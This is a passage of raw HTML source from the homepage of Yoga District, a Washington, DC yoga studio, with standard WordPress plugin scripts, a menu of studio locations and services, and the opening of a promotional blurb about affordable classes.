<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="://www.w3.org/1999/xhtml" lang="en-US"> <head profile="://gmpg.org/xfn/11"> <meta -equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="keywords" content="yoga dc, yoga studio, yoga washington dc, yoga classes, yoga dupont, yoga dupont circle, yoga u street, yoga midtown, yoga bloomingdale, yoga ledroit, power yoga, flow yoga, ashtanga, dharma, teacher training, teacher training dc, teacher training washington dc" /> <meta name="description" content="Yoga District offers affordable yoga classes in three community-run yoga centers committed to eco-friendly practices in Washington, DC. Our locations include Dupont Circle, 14th Street / U St. Corridor, and Bloomingdale / Ledroit Park. Yoga District teachers are trained in a wide range of unique yoga traditions including Vinyasa flow, Iyengar, Dharma Flow, Sivananda, Power, and many others." /> <title>Yoga District - Mindfulness, Yoga &amp; Lifestyle Wellness Yoga District</title> <link REL="SHORTCUT ICON" HREF="://www.yogadistrict.com/wp-content/uploads/2013/04/yd.ico"> <link href="https://www.yogadistrict.com/wp-content/themes/boldy/style.css" rel="stylesheet" type="text/css" /> <link href="https://www.yogadistrict.com/wp-content/themes/boldy/css/ddsmoothmenu.css" rel="stylesheet" type="text/css" /> <link href="https://www.yogadistrict.com/wp-content/themes/boldy/css/prettyPhoto.css" rel="stylesheet" type="text/css" /> <link href="https://www.yogadistrict.com/wp-content/themes/boldy/css/nivo-slider.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="https://www.yogadistrict.com/wp-content/themes/boldy/js/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="https://www.yogadistrict.com/wp-content/themes/boldy/js/jquery.form.js"></script> <script type="text/javascript" src="https://www.yogadistrict.com/wp-content/themes/boldy/js/ddsmoothmenu.js"></script> <script type="text/javascript" src="https://www.yogadistrict.com/wp-content/themes/boldy/js/jquery.nivo.slider.pack.js"></script> <script type="text/javascript" src="https://www.yogadistrict.com/wp-content/themes/boldy/js/jquery.prettyPhoto.js"></script> <script type="text/javascript" src="https://www.yogadistrict.com/wp-content/themes/boldy/js/custom.js"></script> <script type="text/javascript" src="https://www.yogadistrict.com/wp-content/themes/boldy/js/cufon-yui.js"></script> <script type="text/javascript" src="https://www.yogadistrict.com/wp-content/themes/boldy/js/BadNeighborhood-BadhouseBold_500.font.js"></script> <meta name="apple-itunes-app" content="app-id=735421951"/> <!-- Cufon init --> <script type="text/javascript"> Cufon.replace('h1',{hover: true})('h2',{hover: true})('#MainMenu')('.date_links')('.reply',{hover:true}); </script> <script type="text/javascript"> $(document).ready(function(){ $('#quickContactForm').ajaxForm(function(data) { if (data==1){ $('#success').fadeIn("slow"); $('#bademail').fadeOut("slow"); $('#badserver').fadeOut("slow"); $('#contact').resetForm(); } else if (data==2){ $('#badserver').fadeIn("slow"); } else if (data==3) { $('#bademail').fadeIn("slow"); } }); }); </script> <link rel="pingback" href="https://www.yogadistrict.com/xmlrpc.php" /> <link rel='archives' title='May 2019' href='https://www.yogadistrict.com/2019/05/' /> <link rel='archives' title='April 2019' href='https://www.yogadistrict.com/2019/04/' /> <link rel='archives' title='March 2019' href='https://www.yogadistrict.com/2019/03/' /> <link rel='archives' title='February 2019' href='https://www.yogadistrict.com/2019/02/' /> <link rel='archives' title='December 2018' href='https://www.yogadistrict.com/2018/12/' /> <link rel='archives' title='November 2018' href='https://www.yogadistrict.com/2018/11/' /> <link rel='archives' title='October 2018' href='https://www.yogadistrict.com/2018/10/' /> <link rel='archives' title='September 2018' href='https://www.yogadistrict.com/2018/09/' /> <link rel='archives' title='August 2018' href='https://www.yogadistrict.com/2018/08/' /> <link rel='archives' title='July 2018' href='https://www.yogadistrict.com/2018/07/' /> <link rel='archives' title='June 2018' href='https://www.yogadistrict.com/2018/06/' /> <link rel='archives' title='May 2018' href='https://www.yogadistrict.com/2018/05/' /> <link rel='archives' title='April 2018' href='https://www.yogadistrict.com/2018/04/' /> <link rel='archives' title='March 2018' href='https://www.yogadistrict.com/2018/03/' /> <link rel='archives' title='February 2018' href='https://www.yogadistrict.com/2018/02/' /> <link rel='archives' title='January 2018' href='https://www.yogadistrict.com/2018/01/' /> <link rel='archives' title='December 2017' href='https://www.yogadistrict.com/2017/12/' /> <link rel='archives' title='November 2017' href='https://www.yogadistrict.com/2017/11/' /> <link rel='archives' title='September 2017' href='https://www.yogadistrict.com/2017/09/' /> <link rel='archives' title='March 2017' href='https://www.yogadistrict.com/2017/03/' /> <link rel='archives' title='February 2017' href='https://www.yogadistrict.com/2017/02/' /> <link rel='archives' title='January 2017' href='https://www.yogadistrict.com/2017/01/' /> <link rel='archives' title='December 2016' href='https://www.yogadistrict.com/2016/12/' /> <link rel='archives' title='November 2016' href='https://www.yogadistrict.com/2016/11/' /> <link rel='archives' title='October 2016' href='https://www.yogadistrict.com/2016/10/' /> <link rel='archives' title='September 2016' href='https://www.yogadistrict.com/2016/09/' /> <link rel='archives' title='August 2016' href='https://www.yogadistrict.com/2016/08/' /> <link rel='archives' title='July 2016' href='https://www.yogadistrict.com/2016/07/' /> <link rel='archives' title='May 2016' href='https://www.yogadistrict.com/2016/05/' /> <link rel='archives' title='April 2016' href='https://www.yogadistrict.com/2016/04/' /> <link rel='archives' title='February 2016' href='https://www.yogadistrict.com/2016/02/' /> <link rel='archives' title='January 2016' href='https://www.yogadistrict.com/2016/01/' /> <link rel='archives' title='December 2015' href='https://www.yogadistrict.com/2015/12/' /> <link rel='archives' title='November 2015' href='https://www.yogadistrict.com/2015/11/' /> <link rel='archives' title='October 2015' href='https://www.yogadistrict.com/2015/10/' /> <link rel='archives' title='September 2015' href='https://www.yogadistrict.com/2015/09/' /> <link rel='archives' title='August 2015' href='https://www.yogadistrict.com/2015/08/' /> <link rel='archives' title='July 2015' href='https://www.yogadistrict.com/2015/07/' /> <link rel='archives' title='June 2015' href='https://www.yogadistrict.com/2015/06/' /> <link rel='archives' title='May 2015' href='https://www.yogadistrict.com/2015/05/' /> <link rel='archives' title='April 2015' href='https://www.yogadistrict.com/2015/04/' /> <link rel='archives' title='March 2015' href='https://www.yogadistrict.com/2015/03/' /> <link rel='archives' title='February 2015' href='https://www.yogadistrict.com/2015/02/' /> <link rel='archives' title='January 2015' href='https://www.yogadistrict.com/2015/01/' /> <link rel='archives' title='December 2014' href='https://www.yogadistrict.com/2014/12/' /> <link rel='archives' title='November 2014' href='https://www.yogadistrict.com/2014/11/' /> <link rel='archives' title='October 2014' href='https://www.yogadistrict.com/2014/10/' /> <link rel='archives' title='September 2014' href='https://www.yogadistrict.com/2014/09/' /> <link rel='archives' title='August 2014' href='https://www.yogadistrict.com/2014/08/' /> <link rel='archives' title='July 2014' href='https://www.yogadistrict.com/2014/07/' /> <link rel='archives' title='June 2014' href='https://www.yogadistrict.com/2014/06/' /> <link rel='archives' title='May 2014' href='https://www.yogadistrict.com/2014/05/' /> <link rel='archives' title='April 2014' href='https://www.yogadistrict.com/2014/04/' /> <link rel='archives' title='March 2014' href='https://www.yogadistrict.com/2014/03/' /> <link rel='archives' title='February 2014' href='https://www.yogadistrict.com/2014/02/' /> <link rel='archives' title='January 2014' href='https://www.yogadistrict.com/2014/01/' /> <link rel='archives' title='November 2013' href='https://www.yogadistrict.com/2013/11/' /> <link rel='archives' title='October 2013' href='https://www.yogadistrict.com/2013/10/' /> <link rel='archives' title='September 2013' href='https://www.yogadistrict.com/2013/09/' /> <link rel='archives' title='August 2013' href='https://www.yogadistrict.com/2013/08/' /> <link rel='archives' title='July 2013' href='https://www.yogadistrict.com/2013/07/' /> <link rel='archives' title='June 2013' href='https://www.yogadistrict.com/2013/06/' /> <link rel='archives' title='April 2013' href='https://www.yogadistrict.com/2013/04/' /> <link rel='archives' title='March 2013' href='https://www.yogadistrict.com/2013/03/' /> <link rel='archives' title='February 2013' href='https://www.yogadistrict.com/2013/02/' /> <link rel='archives' title='January 2013' href='https://www.yogadistrict.com/2013/01/' /> <link rel='archives' title='November 2012' href='https://www.yogadistrict.com/2012/11/' /> <link rel='archives' title='October 2012' href='https://www.yogadistrict.com/2012/10/' /> <link rel='archives' title='September 2012' href='https://www.yogadistrict.com/2012/09/' /> <link rel='archives' title='August 2012' href='https://www.yogadistrict.com/2012/08/' /> <link rel='archives' title='July 2012' href='https://www.yogadistrict.com/2012/07/' /> <link rel='archives' title='May 2012' href='https://www.yogadistrict.com/2012/05/' /> <link rel='archives' title='April 2012' href='https://www.yogadistrict.com/2012/04/' /> <link rel='archives' title='March 2012' href='https://www.yogadistrict.com/2012/03/' /> <link rel='archives' title='February 2012' href='https://www.yogadistrict.com/2012/02/' /> <link rel='archives' title='January 2012' href='https://www.yogadistrict.com/2012/01/' /> <link rel='archives' title='December 2011' href='https://www.yogadistrict.com/2011/12/' /> <link rel='archives' title='October 2011' href='https://www.yogadistrict.com/2011/10/' /> <link rel='archives' title='September 2011' href='https://www.yogadistrict.com/2011/09/' /> <link rel='archives' title='August 2011' href='https://www.yogadistrict.com/2011/08/' /> <link rel='archives' title='July 2011' href='https://www.yogadistrict.com/2011/07/' /> <link rel='archives' title='June 2011' href='https://www.yogadistrict.com/2011/06/' /> <link rel='archives' title='May 2011' href='https://www.yogadistrict.com/2011/05/' /> <link rel='archives' title='April 2011' href='https://www.yogadistrict.com/2011/04/' /> <link rel='archives' title='March 2011' href='https://www.yogadistrict.com/2011/03/' /> <link rel='archives' title='February 2011' href='https://www.yogadistrict.com/2011/02/' /> <link rel='archives' title='January 2011' href='https://www.yogadistrict.com/2011/01/' /> <!-- This site is optimized with the Yoast SEO plugin v11.2.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Mindfulness, Yoga &amp; Lifestyle Wellness"/> <link rel="canonical" href="https://www.yogadistrict.com/" /> <link rel="next" href="http://www.yogadistrict.com/page/2/" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Mindfulness, Yoga &amp; Lifestyle Wellness" /> <meta name="twitter:title" content="Yoga District - Mindfulness, Yoga &amp; Lifestyle Wellness" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.yogadistrict.com/#organization","name":"","url":"https://www.yogadistrict.com/","sameAs":[]},{"@type":"WebSite","@id":"https://www.yogadistrict.com/#website","url":"https://www.yogadistrict.com/","name":"Yoga District","publisher":{"@id":"https://www.yogadistrict.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.yogadistrict.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.yogadistrict.com/#webpage","url":"https://www.yogadistrict.com/","inLanguage":"en-US","name":"Yoga District - Mindfulness, Yoga &amp; Lifestyle Wellness","isPartOf":{"@id":"https://www.yogadistrict.com/#website"},"about":{"@id":"https://www.yogadistrict.com/#organization"},"description":"Mindfulness, Yoga &amp; Lifestyle Wellness"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.yogadistrict.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='dashicons-css' href='https://www.yogadistrict.com/wp-includes/css/dashicons.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='thickbox-css' href='https://www.yogadistrict.com/wp-includes/js/thickbox/thickbox.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-notification-bars-css' href='https://www.yogadistrict.com/wp-content/plugins/wp-notification-bars/public/css/wp-notification-bars-public.css?ver=1.0.5' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://www.yogadistrict.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='iphorm-css' href='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/css/styles.css?ver=1.10.0' type='text/css' media='all' /> <link rel='stylesheet' id='qtip-css' href='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.css?ver=2.2.1' type='text/css' media='all' /> <link rel='stylesheet' id='iphorm-fancybox-css' href='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.css?ver=1.3.4' type='text/css' media='all' /> <link rel='stylesheet' id='iphorm-uniform-theme-1-css' href='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/js/uniform/themes/default/default.css?ver=1.10.0' type='text/css' media='all' /> <link rel='stylesheet' id='simple-banner-style-css' href='https://www.yogadistrict.com/wp-content/plugins/simple-banner/simple-banner.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='s_pdf_styles-css' href='https://www.yogadistrict.com/wp-content/plugins/simple-pdf-viewer/css/style.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://www.yogadistrict.com/wp-content/plugins/jetpack/css/jetpack.css?ver=7.3.1' type='text/css' media='all' /> <link rel='stylesheet' id='gdwpm_styles-css' href='https://www.yogadistrict.com/wp-content/plugins/google-drive-wp-media/css/lightbox.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='gdwpm_img_styles-css' href='https://www.yogadistrict.com/wp-content/plugins/google-drive-wp-media/css/images.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='gdwpm_justified_styles-css' href='https://www.yogadistrict.com/wp-content/plugins/google-drive-wp-media/css/justifiedGallery.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='socialize-css' href='https://www.yogadistrict.com/wp-content/plugins/socialize/frontend/css/socialize.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='slidedeck-css' href='https://www.yogadistrict.com/wp-content/plugins/slidedeck3-personal/css/slidedeck.css?ver=3.9' type='text/css' media='screen' /> <script type="text/javascript"> window.slideDeck2Version = "3.9"; window.slideDeck2Distribution = "pro"; </script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/iphorm-form-builder/js/iphorm.js?ver=1.10.0'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/simple-banner/simple-banner.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/simple-pdf-viewer/js/main.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/wp-notification-bars/public/js/wp-notification-bars-public.js?ver=1.0.5'></script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/slidedeck-addons/slidedeck-lead-generation/js/vendors/jquery.viewport.mini.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var slideckVars = {"ajax_url":"https:\/\/www.yogadistrict.com\/wp-admin\/admin-ajax.php","unique_pageviews":"2"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.yogadistrict.com/wp-content/plugins/slidedeck-addons/slidedeck-lead-generation/js/hotspot.js?ver=5.1.1'></script> <link rel='https://api.w.org/' href='https://www.yogadistrict.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.yogadistrict.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.yogadistrict.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel='shortlink' href='https://wp.me/8pXpV' /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <style type='text/css'>img#wpstats{display:none}</style><!-- All in one Favicon 4.7 --><link rel="shortcut icon" href="https://www.yogadistrict.com/wp-content/uploads/2013/04/yd.ico" /> <link rel="icon" href="https://www.yogadistrict.com/wp-content/uploads/2013/04/yd.png" type="image/png"/> <style type="text/css" id="wp-custom-css"> #wrap .entry-summary a, #wrap .entry-summary a:visited, #wrap .entry-content a, #wrap .entry-content a:visited { color: blue; text-decoration: underline; } #wrap .entry-summary a:hover, #wrap .entry-content a:hover { color: blue; text-decoration: none; } </style> <script src="//load.sumome.com/" data-sumo-site-id="a432d9dd025c7dacaeaa5a23582a4b253a53f0ebddd14ee07d53a1c7a928b71d" async="async"></script> </head> <body id="home"> <!-- BEGINN MAINWRAPPER --> <div id="mainWrapper"> <!-- BEGIN WRAPPER --> <div id="wrapper"> <!-- BEGIN HEADER --> <div id="header"> <div id="logo"><a href="https://www.yogadistrict.com/"><img src="https://www.yogadistrict.com/wp-content/uploads/2011/05/www.yogadistrict.png" alt="" /></a></div> <!-- BEGIN MAIN MENU --> <div id="mainMenu" class="ddsmoothmenu"><ul id="menu-main-menu" class="menu"><li id="menu-item-63" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-63"><a href="https://www.yogadistrict.com/the-yoga/">The Yoga</a> <ul class="sub-menu"> <li id="menu-item-251" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-251"><a href="https://www.yogadistrict.com/the-yoga/what-class-is-right-for-you/">The right class for you</a></li> <li id="menu-item-372" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-372"><a href="https://www.yogadistrict.com/the-yoga/what-to-expect-during-class/">What to expect during class</a></li> <li id="menu-item-373" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-373"><a href="https://www.yogadistrict.com/the-yoga/tips-for-your-first-visit/">Tips for your first visit</a></li> <li id="menu-item-370" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-370"><a href="https://www.yogadistrict.com/the-yoga/the-workshops/">Workshops and specials</a></li> <li id="menu-item-450" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-450"><a href="https://www.yogadistrict.com/the-yoga/recommended-reads/">Recommended reads</a></li> </ul> </li> <li id="menu-item-64" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-64"><a href="https://www.yogadistrict.com/the-fees/">The Fees</a></li> <li id="menu-item-906" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-906"><a>The Studios</a> <ul class="sub-menu"> <li id="menu-item-8560" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8560"><a href="https://www.yogadistrict.com/the-studios/dupontyoga/">Dupont Circle Studio</a></li> <li id="menu-item-8557" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8557"><a href="https://www.yogadistrict.com/the-studios/14th-street-yoga-dc/">14th Street Studio</a></li> <li id="menu-item-8558" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8558"><a href="https://www.yogadistrict.com/the-studios/i-st-studio-dc/">I Street Studio</a></li> <li id="menu-item-8556" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8556"><a href="https://www.yogadistrict.com/the-studios/h-street-dc/">H Street Studio</a></li> <li id="menu-item-8555" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8555"><a href="https://www.yogadistrict.com/the-studios/bloomingdale-yoga-dc/">Bloomingdale Studio</a></li> <li id="menu-item-8554" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8554"><a href="https://www.yogadistrict.com/the-studios/glover-park-studio-dc/">Glover Park Studio</a></li> <li id="menu-item-8553" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8553"><a href="https://www.yogadistrict.com/the-studios/petworth-studio/">Petworth Studio</a></li> <li id="menu-item-6263" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6263"><a href="https://www.yogadistrict.com/the-studios/green-studios/">Green Studios</a></li> <li id="menu-item-374" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-374"><a href="https://www.yogadistrict.com/the-teachers/">Studio teachers</a></li> </ul> </li> <li id="menu-item-2359" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2359"><a href="https://www.yogadistrict.com/the-teacher-training/">The Training</a></li> <li id="menu-item-4551" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4551"><a>The Services</a> <ul class="sub-menu"> <li id="menu-item-8189" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8189"><a href="https://www.yogadistrict.com/nonprofit-outreach/">Community Outreach</a></li> <li id="menu-item-2439" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2439"><a href="https://www.yogadistrict.com/corporate-workplace-yoga/">Corporate &#038; Workplace</a></li> <li id="menu-item-4555" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4555"><a href="https://www.yogadistrict.com/private-yoga-sessions-at-yoga-district/">Private Yoga</a></li> <li id="menu-item-8199" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8199"><a href="https://www.yogadistrict.com/the-schedule/">Classes</a></li> <li id="menu-item-8198" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8198"><a href="https://www.yogadistrict.com/retreats-workshops/">Retreats &#038; Workshops</a></li> </ul> </li> <li id="menu-item-118" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-118"><a href="https://www.yogadistrict.com/category/the-blog/">The Blog</a></li> <li id="menu-item-2020" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2020"><a href="https://clients.mindbodyonline.com/asp/home.asp?studioid=2070">The Schedule</a></li> </ul></div> <!-- END MAIN MENU --> <!-- BEGIN TOP SEARCH --> <div id="topSearch"> <form id="searchform" action="https://www.yogadistrict.com/" method="get"> <input type="submit" value="" id="searchsubmit"/> <input type="text" id="s" name="s" value="type your search" /> </form> </div> <!-- END TOP SEARCH --> <!-- BEGIN TOP SOCIAL LINKS --> <div id="topSocial"> <ul> <li><a href="://www.twitter.com/yogadistrict" class="twitter" title="Follow Us on Twitter!"><img src="https://www.yogadistrict.com/wp-content/themes/boldy/images/ico_twitter.png" alt="Follow Us on Twitter!" /></a></li> <li><a href="http://www.facebook.com/yogadistrict" class="twitter" title="Join Us on Facebook!"><img src="https://www.yogadistrict.com/wp-content/themes/boldy/images/ico_facebook.png" alt="Join Us on Facebook!" /></a></li> <li><a href="https://www.yogadistrict.com/feed/" title="RSS" class="rss"><img src="https://www.yogadistrict.com/wp-content/themes/boldy/images/ico_rss.png" alt="Subcribe to Our RSS Feed" /></a></li> </ul> </div> <!-- END TOP SOCIAL LINKS --> </div> <!-- END HEADER --> <!-- BEGIN CONTENT --> <div id="content"> <!-- BEGIN SLIDER--> <div class="slidedeck-custom-css-wrapper-3868"><div id="SlideDeck-3868-frame" class="slidedeck-frame slidedeck_frame slidedeck-frame-3868 lens-half-moon show-overlay-always display-nav-hover content-source-custom sd2-hideSpines sd2-show-author sd2-show-author-avatar sd2-show-link-slide sd2-show-title sd2-show-excerpt sd2-show-readmore sd2-custom sd2-large sd2-dark sd2-nav-bottom sd2-nav-inside slidedeck-ie-11" style="width:960px;height:300px;max-width:100%;" data-sd2-lazy-load-padding="1"><dl id="SlideDeck-3868" class="slidedeck slidedeck-3868" style="width:958px;height:298px;"><dt></dt><dd itemscope="" itemtype="http://schema.org/ImageObject" style="" class="has-image has-excerpt no-title custom-layout-caption custom-caption-position-bottom sd2-image-scaling-cover slide-type-image slide-source-custom slide" data-thumbnail-src="https://www.yogadistrict.com/wp-content/uploads/2011/01/yd_slutra_slide-150x150.jpg" data-slide-id="3871" ><div class="sd2-content-wrapper"> <div class="sd2-node-caption" itemprop="name headline"> <div class="sd2-vertical-center-outer"> <div class="sd2-vertical-center-middle"> <div class="sd2-vertical-center-inner"> <div class="sd2-slide-title accent-color"> <div class="sd2-slide-title-inner " > <a class="accent-color" href="https://www.yogadistrict.com/the-teacher-training/" target="_top"> </a> </div> </div> <div class="sd2-slide-text"><p>Share your practice with others. Learn more about getting your yoga teacher training certification.</p> </div> </div> </div> </div> </div> <meta class="hidden" itemprop="caption" content="" /> </div> <img itemprop="thumbnailUrl image" data-fullsrc="https://www.yogadistrict.com/wp-content/uploads/2011/01/yd_slutra_slide.jpg" class="sd2-is-first-slide sd2-slide-background" src="https://www.yogadistrict.com/wp-content/uploads/2011/01/yd_slutra_slide.jpg" alt="" /> <a href="https://www.yogadistrict.com/the-teacher-training/" class="full-slide-link-hit-area" target="_top"></a></dd><dt></dt><dd itemscope="" itemtype="http://schema.org/ImageObject" style="" class="has-image has-excerpt no-title custom-layout-caption custom-caption-position-bottom sd2-image-scaling-cover slide-type-image slide-source-custom slide" data-thumbnail-src="https://www.yogadistrict.com/wp-content/uploads/2017/02/jaz_dead-resize-150x57.jpg" data-slide-id="9324" ><div class="sd2-content-wrapper"> <div class="sd2-node-caption" itemprop="name headline"> <div class="sd2-vertical-center-outer"> <div class="sd2-vertical-center-middle"> <div class="sd2-vertical-center-inner"> <div class="sd2-slide-title accent-color"> <div class="sd2-slide-title-inner " > <a class="accent-color" href="https://www.yogadistrict.com/the-yoga/" target="_top"> </a> </div> </div> <div class="sd2-slide-text"><p>New to yoga? Don&#8217;t worry. We&#8217;ve got something for everyone. Let us help find the right class for you.</p> </div> </div> </div> </div> </div> <meta class="hidden" itemprop="caption" content="" /> </div> <img itemprop="thumbnailUrl image" data-fullsrc="https://www.yogadistrict.com/wp-content/uploads/2017/02/jaz_dead-resize.jpg" class="slide-deck-lazy sd2-slide-background" data-src="https://www.yogadistrict.com/wp-content/uploads/2017/02/jaz_dead-resize.jpg" src="https://www.yogadistrict.com/wp-content/plugins/slidedeck3-personal/lib/../images/blank.gif" alt="" /> <noscript><img class="nolazy sd2-slide-background" src="https://www.yogadistrict.com/wp-content/uploads/2017/02/jaz_dead-resize.jpg" alt="" /></noscript> <a href="https://www.yogadistrict.com/the-yoga/" class="full-slide-link-hit-area" target="_top"></a></dd></dl><div class="slidedeck-overlays" data-for="SlideDeck-3868"><a href="#slidedeck-overlays" class="slidedeck-overlays-showhide">Overlays<span class="open-icon"></span><span class="close-icon"></span></a><span class="slidedeck-overlays-wrapper"><input type="hidden" id="overlay_pinterest" class = "overlay_pinterest" name="overlay_pinterest" value="0"/></span></div><script type="text/javascript" src="//assets.pinterest.com/js/pinit.js"></script><a class="deck-navigation horizontal prev" href="#prev-horizontal"><span>Previous</span></a><a class="deck-navigation horizontal next" href="#next-horizontal"><span>Next</span></a><a class="deck-navigation vertical prev" href="#prev-vertical"><span>Previous</span></a><a class="deck-navigation vertical next" href="#next-vertical"><span>Next</span></a></div></div> <!-- <div id="slider"> <img class="alignnone size-medium wp-image-9303" src="https://www.yogadistrict.com/wp-content/uploads/2017/02/YD_Home_Banner_resized-1-300x116.jpg" alt="" width="300" height="116" /><img class="alignnone size-medium wp-image-9301" src="https://www.yogadistrict.com/wp-content/uploads/2017/02/jaz_dead-resize-300x114.jpg" alt="" width="300" height="114" /> </div> <!-- END SLIDER --> <!-- BEGIN BLURB --> <!-- END BLURB --> <!-- BEGIN HOME CONTENT --> <!-- begin home boxes --> <div id="homeBoxes" class="clearfix"> <div class="homeBox"> <h2>The Basics</h2> <img src="/wp-content/uploads/2011/01/roughline.png" style="margin-top:-10px; margin-bottom:10px;"> <div style="height: 420px;" id="innerBox"> <p><strong>Yoga District, the highest-rated DC yoga studio on yelp.com for over a year</strong>, offers affordable and by-donation yoga classes in community-run yoga centers committed to eco-friendly practices. Why not join us?</p> <p>Our laid back community of diverse students and <a href="https://www.yogadistrict.com/the-teachers/">dedicated teachers</a> are exploring yoga for fun, health, peace, and a variety of other 